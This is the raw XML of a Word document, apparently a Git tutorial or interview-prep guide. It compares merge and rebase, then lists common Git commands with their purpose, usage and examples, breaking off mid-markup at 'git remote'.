    <w:p w14:paraId="65F1CA66"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git rebase</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE8ECA" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Use it when you want a clean, linear history without merge commits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E885CA" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Ideal for feature branches before merging into the main branch to keep the commit history clean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24618F3F" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Be careful when rebasing public/shared branches because it rewrites commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC116D6" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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001D8DA">
          <v:rect id="_x0000_i3341" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395FD5E"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Example Scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25A8A9"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Merging a feature branch into the main branch</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC426FF" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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lastRenderedPageBreak/>
        <w:t>After finishing the feature, use git merge to combine the feature with the main branch. This will create a merge commit that shows when the feature was integrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F18E90A"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Rebasing a feature branch onto the latest main</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B10DC2" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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If you're working on a feature branch and the main branch has moved forward (i.e., new commits are added to main), you might want to git rebase to keep your feature branch up-to-date without introducing a merge commit. This will apply your commits on top of the latest main changes, preserving a linear history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08699F53" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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1E8EBBB">
          <v:rect id="_x0000_i3342" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5711F071"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Example of Rebase vs. Merge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66420F37"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Merge Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4EADF7"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checkout main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58748F4E"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merge feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA947B"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Result: Merge commit appears in the history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0EF0CC"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Rebase Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5138B234"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checkout feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719448B"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rebase main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F673F31"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Result: Feature branch commits are re-applied on top of main, resulting in a cleaner history without a merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F02B91" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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FA811D0">
          <v:rect id="_x0000_i3343" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C441C1"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In conclusion, both merge and rebase serve the purpose of integrating changes, but merge preserves the history with a merge commit, while rebase rewrites history to create a linear progression of commits. The choice between the two depends on whether you prioritize preserving branch history (merge) or creating a cleaner, linear history (rebase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B876089" w14:textId="2AF1E29A" w:rsidR="000C6CF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000C6CF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1057F4F">
          <v:rect id="_x0000_i3344" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="688EDD98" w14:textId="07E5CEBF" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0846">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="829" w:name="_Toc196308309"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain a Git commands</w:t>
      </w:r>
      <w:r w:rsidR="00D70F52" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="829"/>
    </w:p>
    <w:p w14:paraId="25489B5B" w14:textId="2A4BEC33" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">Here’s a detailed explanation of some commonly used </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Git commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7CB3C5"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1. git init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64098041"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initializes a new Git repository in your current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A28D6"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You run this command inside a project folder to start using Git with that project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D70CF"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init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BED9196"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2. git clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F6FFE8"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates a copy of a remote repository on your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C44E01"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can clone an existing repository from a remote source (e.g., GitHub).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F17DB1"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clone https://github.com/username/repository.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796FB68E"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3. git status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB5BD3"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows the current state of your working directory and staging area.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE7968"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command tells you which files are staged for the next commit, which files have been modified, and which are untracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514456C2"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status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1315C"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4. git add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8F6AF1"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds files to the staging area, preparing them for a commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C067531"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You need to specify which files to add, or use . to add all modified files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECACA3D"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add file1.txt         # Adds a specific file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BD8683"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add .                 # Adds all changes in the current directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE2F46"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5. git commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C8688C"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Records the changes in the staging area to the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F8DB6"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After adding changes, use git commit to save them to the repository’s history. Always include a meaningful commit message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC6A91"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commit -m "Commit message"     # Commit with a message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37210249"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6. git push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08617A8C"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Uploads your local commits to a remote repository (e.g., GitHub, GitLab).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7000A"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After committing changes locally, push those changes to the remote branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9356F"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push origin main     # Pushes changes to the 'main' branch on remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6743A6D5"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7. git pull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29642C78"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetches changes from a remote repository and merges them into your current branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AD170"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command is used to update your local repository with the latest changes from the remote.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511160FF"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lastRenderedPageBreak/>
        <w:t>git pull origin main     # Pulls changes from the 'main' branch on the remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2F008"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8. git fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F21C6"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetches changes from the remote repository but doesn’t merge them. This allows you to check for updates without modifying your local working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F6B9E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command is typically used before performing a git merge or git rebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67105933"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fetch origin         # Fetches changes from the 'origin' remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793ADA55"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9. git merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D6E2CB"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Combines the changes from one branch into another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC75F97"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After switching to the target branch, use git merge to integrate another branch's changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAACF29"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merge feature-branch     # Merges the changes from 'feature-branch' into the current branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DA57A7"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10. git branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2461499B"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists all branches in the repository, or creates and deletes branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43519208"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command helps you create, list, or delete branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C04C4"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branch                # Lists all branches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042F8E1A"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branch new-branch     # Creates a new branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B2615"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branch -d old-branch # Deletes a branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA0B4AB"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11. git checkout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FD112"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Switches between branches or restores files to their last committed state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37448E49"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use this command to switch to another branch or revert a file to a previous state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C134BFA"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checkout feature-branch  # Switch to 'feature-branch'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B569E45"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checkout file1.txt       # Revert 'file1.txt' to the last committed version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75029ED8"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12. git log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094C653"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows the commit history of the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66890962"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command displays the commit history along with commit IDs, messages, and timestamps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3239ED63"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log               # Shows a detailed log of all commits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7354CCC6"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log --oneline     # Shows a compact log with one line per commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740B1A8"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13. git reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EC38E6"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unstages changes or resets the commit history to a specific state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4F923E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use it to undo changes or reset to a particular commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA2154"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reset HEAD file1.txt       # Unstages 'file1.txt' from the staging area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD4DF6"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reset --hard commit_id     # Resets your local branch to a specific commit (WARNING: This will delete uncommitted changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F34A3EB"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14. git rebase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31814823"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Re-applies commits from one branch onto another, rewiring history to create a linear progression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B9316B"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command is often used to make your feature branch up-to-date with the base branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A9B362"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checkout feature-branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57538473"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rebase main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0D256A"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15. git stash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25613418"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Temporarily saves uncommitted changes, allowing you to switch branches or perform other tasks without losing your work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18355E"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can stash your changes, switch branches, and apply the stash later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C416EA"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stash             # Stashes your changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFD897"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stash apply      # Applies the most recent stash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214DA91"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stash pop        # Applies the most recent stash and removes it from the stash list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511D1FB"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16. git tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B153D8"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates a reference to a specific commit, typically used to mark releases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA27C9"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can create annotated or lightweight tags to mark important points in your project’s history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A052B35"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tag v1.0               # Creates a lightweight tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035733EC"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tag -a v1.0 -m "First release"  # Creates an annotated tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FA9E5"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17. git diff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD582C5"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows the differences between your working directory and the last commit, or between two commits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73068B77"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is useful to see what has changed in your files before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D215482"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diff                # Shows changes between working directory and staging area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3D7DD"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diff commit_id1 commit_id2    # Shows differences between two commits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286D34EB"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18. git remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093E9FA"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
